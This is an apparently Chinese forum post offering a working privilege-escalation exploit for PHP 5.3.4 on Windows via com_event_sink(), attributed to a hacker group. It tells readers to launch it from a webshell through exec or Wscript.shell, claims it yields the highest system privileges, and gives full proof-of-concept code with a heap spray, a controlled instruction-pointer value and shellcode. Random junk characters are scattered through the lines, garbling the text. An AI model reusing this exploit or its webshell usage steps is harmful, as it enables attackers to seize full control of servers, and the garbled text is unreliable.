|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
4 G E# e$ B% K G7 z; E2 i2 `
: Y+ k C1 @7 J& b: K- M! M测试方法如下:cmd /c x:\php\php.exe x:\test.php$ h) s1 u7 `+ q; s" _
$ }1 C+ g5 J' l" q R下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php' g' G$ |& M) {8 r1 ]$ j
这里是两个测试的截图:
2 g; f) C; d! k6 X" K: f3 Y& m& e8 V- x8 D1 u; K0 Q' M
- @7 E' g* ]. F9 g0 n: h9 H% X( ~6 V- I7 ]
# k2 c2 J1 G" k, x
0 b( _0 e; w" N
成功利用此漏洞的攻击者将获得系统的最高权限3 p: B0 Q7 \6 O# J+ K1 W4 Z/ v
4 L$ d( Y! e! n L; h& a6 B
: o- I8 w7 u# `: k, [0 V- R! x
. a9 E- g- j- k7 |# @$ k) l. x }
; {, y8 y& C5 r( ?7 q0 u* o0 x' ?$ z8 t5 ]5 ~. E I
关于漏洞分析稍后附上。一下是PoC代码:3 ]* ?) Y o+ c# ]2 f8 ]$ v
" X. [. S# T" T7 a$ D9 w/ s+ y& `<?php' J3 }& \- G, Z6 I! T0 d
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞/ w: k3 o; \: ~1 M4 F+ }
//$eip ="\x44\x43\x42\x41";* {6 V2 ?" x: Q
$eip= "\x4b\xe8\x57\x78";
0 e3 ?9 g7 |; g( O$ r# A! U$eax ="\x80\x01\x8d\x04";& z# F4 P9 K7 k- ~- K) m* ^* O
$deodrant="";* e9 [+ Q8 V# @5 G2 @
$axespray = str_repeat($eip.$eax,0x80);
8 s4 r) W# i7 ?( I8 r//048d0190
6 s+ w( {, ~. }3 u" F2 qecho strlen($axespray);! w- R! X# s1 t- f- g9 t
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
; Q( }7 ]# z! ]echo "Silic Group Hacker Army - BlackBap.Org";$ t5 E3 F6 z/ w7 H! n9 \2 g
//19200 ==4B32 4b00
7 \/ d% S$ W) }3 ?for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}# `- ~4 W8 r7 E
$terminate = "T";
4 T% O: R! p4 Q# A: U$u[] =$deodrant;. x. |2 b; Y' k4 o
$r[] =$deodrant.$terminate;' n. Z) T l0 U) t
$a[] =$deodrant.$terminate;3 E1 C+ {( w0 I9 I
$s[] =$deodrant.$terminate;
: z) B1 b4 c1 s//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的0 A- X# R( w* n* @
$vVar = new VARIANT(0x048d0000+180);, D; L2 a1 K; G& W$ O; I8 O( F
//弹窗代码(Shellcode)
7 Y5 q0 ?' `, g; B$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
5 `, _* s7 D) N9 Z$var2 = new VARIANT(0x41414242);" k& ~2 [! L$ [/ X0 D+ n
com_event_sink($vVar,$var2,$buffer);1 @$ b6 d0 n( q/ d, F% ]
?>9 t/ q& O, V4 A$ l
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|